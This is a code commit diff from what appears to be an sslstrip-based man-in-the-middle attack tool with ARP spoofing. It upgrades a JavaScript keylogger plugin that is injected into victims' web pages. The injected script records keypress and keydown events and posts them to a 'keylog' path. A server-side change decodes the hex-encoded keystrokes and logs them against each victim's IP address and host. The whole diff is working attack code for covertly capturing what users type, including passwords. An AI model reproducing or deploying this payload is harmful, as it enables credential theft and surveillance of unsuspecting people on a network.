revamped jskeylogger plugin

plugins/ArpSpoof.py

@@ -33,7 +33,7 @@ class ArpSpoof(Plugin):
         if self.interface == None or self.routerip == None:
             sys.exit("[-] %s plugin requires --routerip and --interface" % self.name)
 
-        print "[*] ArpSpoof plugin online"
+        print "[*] %s plugin online" % name
         if self.setup == True:
             print '[*] Setting up ip_forward and iptables'
             file = open('/proc/sys/net/ipv4/ip_forward', 'w')

plugins/jskeylogger.py

@@ -9,14 +9,15 @@ class jskeylogger(Inject, Plugin):
 
     def initialize(self,options):
         Inject.initialize(self, options)
-        self.html_payload = self.get_payload()
+        self.html_payload = self.msf_keylogger()
         print "[*] %s online" % self.name
 
-    def get_payload(self):
+    def msf_keylogger(self):
-        #simple js keylogger stolen from http://wiremask.eu/xss-keylogger/
+        #Stolen from the Metasploit module http_javascript_keylogger
 
         payload = """<script type="text/javascript">
-var keys = '';
+window.onload = function mainfunc(){
+var2 = ",";
 
 function make_xhr(){
     var xhr;
@@ -42,21 +43,42 @@ function make_xhr(){
             }
         }
 
-document.onkeypress = function(e) {
+if (window.addEventListener) {
-    var get = window.event ? event : e;
+document.addEventListener('keypress', function2, true);
-    var key = get.keyCode ? get.keyCode : get.charCode;
+document.addEventListener('keydown', function1, true);
-    key = String.fromCharCode(key);
+} else if (window.attachEvent) {
-    keys += key;
+document.attachEvent('onkeypress', function2);
+document.attachEvent('onkeydown', function1);
+} else {
+document.onkeypress = function2;
+document.onkeydown = function1;
 }
 
-window.setInterval(function(){
+}
-    if (keys.length > 0){
+function function2(e){
-        xhr.open("POST", "keylog", true);
+var3 = (window.event) ? window.event.keyCode : e.which;
-        xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
+var3 = var3.toString(16);
-        xhr.send(keys);
+if (var3 != "d"){
-        keys = '';
+function3(var3);
-    }
+}
-}, 1000);
+}
+function function1(e){
+var3 = (window.event) ? window.event.keyCode : e.which;
+if (var3 == 9 || var3 == 8 || var3 == 13){
+function3(var3);
+}
+}
+
+function function3(var3){
+var2 = var2 + var3 + ",";
+
+xhr.open("POST", "keylog", true);
+xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
+xhr.send(var2);
+
+if (var3 == 13 || var2.length > 3000)
+    var2 = ",";
+}
 </script>"""
 
         return payload

sslstrip/ServerConnection.py

@@ -80,7 +80,24 @@ class ServerConnection(HTTPClient):
             logging.warning(str(self.client.getClientIP()) + " Browser Profilerer data:\n" + out)
         
         elif 'keylog' in self.uri:
-            logging.warning(str(self.client.getClientIP()) + " ["+ self.headers['host'] + "] " "Keys: " + self.postData)
+            keys = self.postData.split(",")
+            del keys[0]; del(keys[len(keys)-1])
+
+            nice = ''
+            for n in keys:
+                if n == '9':
+                    nice += "<TAB>"
+                elif n == '8':
+                    nice = nice.replace(nice[-1:], "")
+                elif n == '13':
+                    nice = ''
+                else:
+                    try:
+                        nice += n.decode('hex')
+                    except:
+                        print "ERROR: unknown char " + n
+
+            logging.warning(str(self.client.getClientIP()) + " ["+ self.headers['host'] + "] " "Keys: " + nice)
         
         else:
             logging.warning(self.getPostPrefix() + " Data (" + self.headers['host'] + "):\n" + str(self.postData))